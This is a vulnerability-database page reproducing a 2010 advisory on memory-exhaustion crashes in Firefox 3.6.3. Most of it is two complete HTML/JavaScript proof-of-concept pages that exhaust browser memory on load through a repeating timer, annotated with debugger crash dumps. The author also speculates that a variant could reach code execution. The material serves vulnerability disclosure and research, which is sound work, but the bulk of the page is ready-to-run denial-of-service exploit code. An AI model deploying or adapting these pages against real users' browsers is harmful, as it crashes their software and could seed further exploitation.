Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Firefox 3.6.3 (latest) <= memory exhaustion crash vulnerabilities

🗓️ 21 May 2010 00:00:00Reported by x90cType 
zdt
 zdt🔗 0day.today👁 38 Views

Firefox memory exhaustion cras

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus		Mozilla Firefox < 3.0.18 / 3.5.8 / 3.6 Multiple Vulnerabilities
18 Feb 201000:00
nessus
Tenable Nessus		SeaMonkey < 2.0.3 Multiple Vulnerabilities
18 Feb 201000:00
nessus
Tenable Nessus		Mozilla Thunderbird < 3.0.2 Multiple Vulnerabilities
4 Mar 201000:00
nessus
Tenable Nessus		Mozilla Thunderbird < 3.0.2 Multiple Vulnerabilities
4 Mar 201000:00
nessus
Tenable Nessus		Mozilla SeaMonkey < 2.0.3 Multiple Vulnerabilities
18 Feb 201000:00
nessus
Tenable Nessus		Mozilla Firefox < 3.0.18 / 3.5.8 / 3.6 Multiple Vulnerabilities
18 Feb 201000:00
nessus
Tenable Nessus		CentOS 4 / 5 : firefox (CESA-2010:0112)
18 Feb 201000:00
nessus
Tenable Nessus		CentOS 3 / 4 : seamonkey (CESA-2010:0113)
18 Feb 201000:00
nessus
Tenable Nessus		CentOS 5 : thunderbird (CESA-2010:0153)
29 Mar 201000:00
nessus
Tenable Nessus		CentOS 4 : thunderbird (CESA-2010:0154)
19 Mar 201000:00
nessus
Rows per page
=================================================================
Firefox 3.6.3 (latest) <= memory exhaustion crash vulnerabilities
=================================================================


Title: Firefox 3.6.3 (latest) <= memory exhaustion crash vulnerabilities
 
0x01. Description:
Memory exhaustion of Firefox 3.6.3 (latest) <= makes firefox can't make texts into body element and then it crashed.
( raise exception using PoC #1, lower memory area read access violation using PoC #2 )
Ofcourse an variation PoC made NULL Pointer deref so may also could be code execution ( 0.1 % ). :-)
 
URL: http://www.x90c.org/advisories/firefox_3.6.3_crash_advisory.txt
 
Vendor Status: unpatched. ( to now... doesn't exists any reliable exploit so i disclosed to bugtraq firstly )
 
0x02. Proof of Concepts:
 
[PoC #1 - firefox_3.6.3_dos_poc_1.htm] --
<HTML>
<HEAD>
<SCRIPT LANGUAGE="javascript">
 
// Mozilla Firefox <= 3.6.3 (Win32) 0Day DoS Proof-of-Concept #1
//
// o Summary:
// After loading this PoC, about 40 seconds later triggered.
// Crashes are occured at a same location.
//
// --
// 7c7e2af5 ff1510157d7c    call    dword ptr [kernel32!_imp__RtlRaiseException (7c7d1510)]
//                                  ds:0023:7c7d1510={ntdll!RtlRaiseException (7c93e528)} ( raised )
//
// ##### 100% same below crash. exception raised. #####
// (f34.850): C++ EH exception - code e06d7363 (first chance)
// (f34.850): C++ EH exception - code e06d7363 (!!! second chance !!!)
// eax=0012aa58 ebx=01000121 ecx=00000000 edx=781d7ba8 esi=0012aae0 edi=2f900008
// eip=7c7e2afb esp=0012aa54 ebp=0012aaa8 iopl=0         nv up ei pl nz na pe nc
// cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
// kernel32!RaiseException+0x53:
// 7c7e2afb 5e              pop     esi
// --
//
// Call Stack:
// 00 0012aa28 7815c54b e06d7363 00000001 00000003 kernel32!RaiseException+0x53
// WARNING: Stack unwind information not available. Following frames may be wrong.
// 01 0012aa60 78164f33 0012aa70 781caa24 781ac11c MOZCRT19!CxxThrowException+0x46
// 02 0012aa78 100cd464 08c00060 0012b1a0 21500008 MOZCRT19!operator new+0x73
// 03 00000000 00000000 00000000 00000000 00000000 xul!gfxWindowsFontGroup::MakeTextRun+0x54
 
// Trace:
// MOZCRT19!operator new:
//    78164ec0 8b442404        mov     eax,dword ptr [esp+4]
//    78164ec4 83ec0c          sub     esp,0Ch
//    78164ec7 50              push    eax
//    78164ec8 e8134bfdff      call    MOZCRT19!malloc (781399e0)
//  ...
//    78164f26 c74424081cc11a78 mov     dword ptr [esp+8],offset MOZCRT19!exception::`vftable'+0xc14 (781ac11c)
//    78164f2e e8d275ffff      call    MOZCRT19!CxxThrowException (7815c505)    ; Throw Exception.
//    78164f33 83c40c          add     esp,0Ch
//    78164f36 c3              ret
//
// MOZCRT19!CxxThrowException:
//    7815c505 55              push    ebp
//    7815c506 8bec            mov     ebp,esp
//    7815c508 83ec20          sub     esp,20h
//  ...
//    7815c545 ff15e4911a78    call    dword ptr [MOZCRT19!modf+0x87d4 (781a91e4)] ds:0023:781a91e4=
//              {kernel32!RaiseException (7c7e2aa9)} ; Raise Exception!
//
// o Impact: DoS ( Exception Raise )
//
// o Tested on:
//      - MS Win XP SP3 (ko)
//      - Mozilla Firefox 3.6.3 (Win32) (ko)
//        ( Mozilla/5.0, rv:1.9.2.3, Gecko/20100401 )
//
// P.S: This vulnerability similer with the CVE-2009-1571 [1] but it's patched on Firefox 3.6
//      so this is *not the same vulnerability*!
//
// [1] CVE-2009-1571 ( Credit: Alin Rad Pop of Secunia ) - Thanks to Alin Rad Pop.
//     - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1571
//
// o Discovered by x90c in INetCop(c) Security during analysis.
// o Discovered date: 2010.03.04
// o Personal homepage: http://www.x90c.org
//
// Greets to Xpl017Elz(x82), rebel
//
 
function append_text_into_body()
{
    var p1 = document.getElementById('p1');
    var Text1 = "";
    var TextNode = null;
 
    // Trigger! MakeFont... into p element on body element.
    for(var i = 0; i < 0x700000 / 4; i++)
    {
        Text1 = Text1 + "AAAA";
    }
 
    TextNode = document.createTextNode(Text1);
    p1.appendChild(TextNode);   // Memory Exhaustion makes FireFox can't make Texts it caused an crash.
}
 
var arr1, arr2, arr3, arr4, arr5;
var a = 1;
 
var timer;
 
function fill_all_memory()
{
    var chunk = unescape("%u4141%u4141");
    var i = 0;
 
    if( a > 5 )
    {
        a++;
    }
    if(a >= 30)
    {
        append_text_into_body();
    }
 
    while(chunk.length <= 0x400000)
    {
        chunk = chunk + chunk;
    }
    chunk = chunk + chunk + chunk;
    chunk = chunk.substring(0, chunk.length);
 
    if(a == 1)
    {
        arr1 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr1[i] = chunk;
        }
        a = 2;
    }
    else if(a == 2)
    {
        arr2 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr2[i] = chunk;
        }
        a = 3;
    }
    else if(a == 3)
    {
        arr3 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr3[i] = chunk;
        }
        a = 4;
    }
    else if(a == 4)
    {
        arr4 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr4[i] = chunk;
        }
        a = 5;
    }
    else if(a == 5)
    {
        arr5 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr5[i] = chunk;
        }
        a = 6;
    }
}
 
function try_fill()
{
    fill_all_memory();
    setTimeout("try_fill();", 500);
}
 
</SCRIPT>
</HEAD>
 
<BODY onload="try_fill();">
<P id='p1'></P>
</BODY>
</HTML>
 
<!-- [ eoc ] -->
 
 
[PoC #2 - firefox_3.6.3_dos_poc_2.htm] --
 
<HTML>
<HEAD>
<SCRIPT LANGUAGE="javascript">
 
// Mozilla Firefox <= 3.6.3 (Win32) 0Day DoS Proof-of-Concept #2
//
// o Summary:
// After loading this PoC, about 40 seconds later triggered.
// Crashes are occured at a same location.
//
// --
// #####  almost 99% below crash #####
// (f0c.8b4): Access violation - code c0000005 (first chance)
// First chance exceptions are reported before any exception handling.
// This exception may be expected and handled.
// eax=0012aab8 ebx=00002226 ecx=000042a4 edx=000000ee esi=00003ce8 edi=000000ee
// eip=73f937cd esp=0012a3fc ebp=0012a3fc iopl=0         nv up ei pl zr na pe nc
// cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
// USP10!DoubleWideCharMappedString::operator[]+0x1f:
// 73f937cd 0fb70448        movzx   eax,word ptr [eax+ecx*2] ds:0023:00133000=???? ( beside stack area and unmapped )
// --
//
// 0:000> kp
// ChildEBP RetAddr 
// 0012a3fc 73f99a42 USP10!DoubleWideCharMappedString::operator[]+0x1f
// 0012a4cc 73f92d34 USP10!ScriptTokenize+0x91
// 0012a4f4 100efc30 USP10!ScriptItemize+0x42
// WARNING: Stack unwind information not available. Following frames may be wrong.
// 0012a5a0 7813807d xul!gfxWindowsFontGroup::GetUnderlineOffset+0x4cb0
// 00000000 00000000 MOZCRT19!expand+0x37d
//
// o Impact: DoS ( may also code execution )
//
// o Tested on:
//      - MS Win XP SP3 (ko)
//      - Mozilla Firefox 3.6.3 (Win32) (ko)
//        ( Mozilla/5.0, rv:1.9.2.3, Gecko/20100401 )
//
// P.S: This vulnerability similer with the CVE-2009-1571 [1] but it's patched on Firefox 3.6
//      so this is *not the same vulnerability*! and this makes same crash with [2]
//
// [1] CVE-2009-1571 ( Credit: Alin Rad Pop of Secunia ) - Thanks to Alin Rad Pop.
//     - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1571
//
// [2] All browsers 0day Crash Exploit ( Inj3ct0r Team )
//     - http://www.exploit-db.com/exploits/12491
//
// o Discovered by x90c in INetCop(c) Security during analysis.
// o Discovery date: 2010.03.04
// o Personal homepage: http://www.x90c.org
//
// Greets to Xpl017Elz(x82), rebel
//
 
function append_text_into_body()
{
    var p1 = document.getElementById('p1');
    var Text1 = "";
    var TextNode = null;
 
    // Trigger! MakeFont... into p element on body element.
    for(var i = 0; i < 0x700000 / 4; i++)
    {
        Text1 = Text1 + "AAAA";
    }
 
    TextNode = document.createTextNode(Text1);
    p1.appendChild(TextNode);   // Memory Exhaustion makes FireFox can't make Texts it caused an crash.
}
 
var a = 1;
 
var timer;
 
function fill_all_memory()  // This function's variation can makes an null pointer deref without append_text_into_body() calling.
{
    var chunk = unescape("%u4141%u4242");
    var i = 0;
 
    append_text_into_body();
 
    while(chunk.length <= 0x400000)
    {
        chunk = chunk + chunk;
    }
    chunk = chunk + chunk + chunk;
    chunk = chunk.substring(0, chunk.length);
}
 
function try_fill()
{
    fill_all_memory();
    // this poc makes 99% almost crashed same location as below.
    // 10: USP10!DoubleWideCharMappedString::operator[]+0x1f:
    //     73f937cd 0fb70448        movzx   eax,word ptr [eax+ecx*2] ds:0023:00133000=????
    // 100: ''
    // 150: ''
    // 200: ''
    // 300: ''
    // 500: ''
    // 1000: ''
    // 5000: ''
    setTimeout("try_fill();", 10);
}
 
</SCRIPT>
</HEAD>
 
<BODY onload="try_fill();">
<P id='p1'></P>
</BODY>
 
</HTML>
 
<!-- [ eoc ] -->



#  0day.today [2018-03-20]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 May 2010 00:00Current
7High risk
Vulners AI Score7
EPSS0.07108
firefox 3.6.3memory exhaustioncrashvulnerabilitiespocdosmozilla firefoxexploitsecurity advisory
38